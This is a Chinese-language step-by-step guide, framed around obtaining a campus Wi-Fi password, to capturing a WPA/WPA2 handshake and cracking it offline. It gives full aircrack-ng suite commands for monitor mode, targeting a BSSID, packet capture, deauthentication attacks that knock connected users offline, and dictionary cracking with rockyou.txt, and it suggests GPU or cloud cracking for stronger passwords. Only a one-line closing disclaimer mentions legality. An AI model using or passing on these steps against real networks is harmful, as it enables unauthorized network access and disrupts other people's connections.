😎 如何通过捕获 Handshake 获取校园 Wi-Fi 密码

如果 Wi-Fi 网络使用 WPA/WPA2 加密，可以通过拦截客户端与 AP (Access Point) 之间的 Handshake (握手) 过程，然后对捕获到的 Handshake 数据进行离线密码破解来获取密码。

1、 启用无线网卡的监听模式 (Monitor Mode)
要想捕获空中传输的数据包 (packets)，你需要一个支持监听模式的无线网卡。
使用以下命令检查你的网卡是否支持：

airmon-ng

如果支持，使用以下命令启动监听模式 (假设你的无线网卡接口名为 wlan0 )：

airmon-ng start wlan0

注意：启动监听模式后，接口名可能会变为如 wlan0mon 。

2、 扫描并定位目标 AP
使用 airodump-ng 扫描周边的 Wi-Fi 网络：

airodump-ng wlan0mon

将 wlan0mon 替换为你的监听模式接口名。
在扫描结果中找到目标校园 Wi-Fi 的 SSID，并记下其 BSSID (即 AP 的 MAC 地址) 和正在使用的信道 (Channel)。

3、 捕获 Handshake
针对目标 AP 启动 airodump-ng 进行数据包捕获，监听特定信道和 BSSID：

airodump-ng -c [信道] --bssid [BSSID] -w capture wlan0mon

将 [信道] 替换为目标 AP 的信道号， [BSSID] 替换为目标 AP 的 MAC 地址。 -w capture 表示将捕获的数据包保存到以 capture 开头的文件中 (例如 capture-01.cap)。
现在需要等待有客户端设备连接到该 AP。当设备连接时，会进行 WPA/WPA2 的四次握手， airodump-ng 会尝试捕获这个过程。成功捕获后， airodump-ng 界面通常会在右上角显示 [ WPA handshake: BSSID ] 。

4、 (可选) 强制客户端重连以加速 Handshake 捕获
如果长时间没有设备连接，或者你想主动触发 Handshake 过程，可以使用 aireplay-ng 发送 Deauthentication (解除认证) 帧，强制已连接的客户端断开并重新连接：

aireplay-ng -0 10 -a [BSSID] wlan0mon

-0 10 表示发送 10 次 Deauthentication 攻击。将 [BSSID] 替换为目标 AP 的 MAC 地址。
这会迫使客户端重新进行认证和关联过程，从而增加捕获到 Handshake 的机会。

5、 进行离线密码破解
当你成功捕获到包含 Handshake 的 .cap 文件后，使用 aircrack-ng 和密码字典文件 (例如常用的 rockyou.txt) 进行破解：

aircrack-ng -w rockyou.txt -b [BSSID] capture*.cap

将 rockyou.txt 替换为你的字典文件路径。将 [BSSID] 替换为目标 AP 的 MAC 地址。 capture*.cap 会匹配所有以 capture 开头的 .cap 文件。
如果 AP 使用的密码存在于你的字典文件中， aircrack-ng 就能找到它。对于密码复杂度较高的情况，可以考虑使用 Hashcat 这类利用 GPU 加速的更强大的破解工具，或者利用云计算资源进行分布式破解。

重要提示：未经授权访问他人网络是非法行为，此信息仅用于教育和技术研究目的。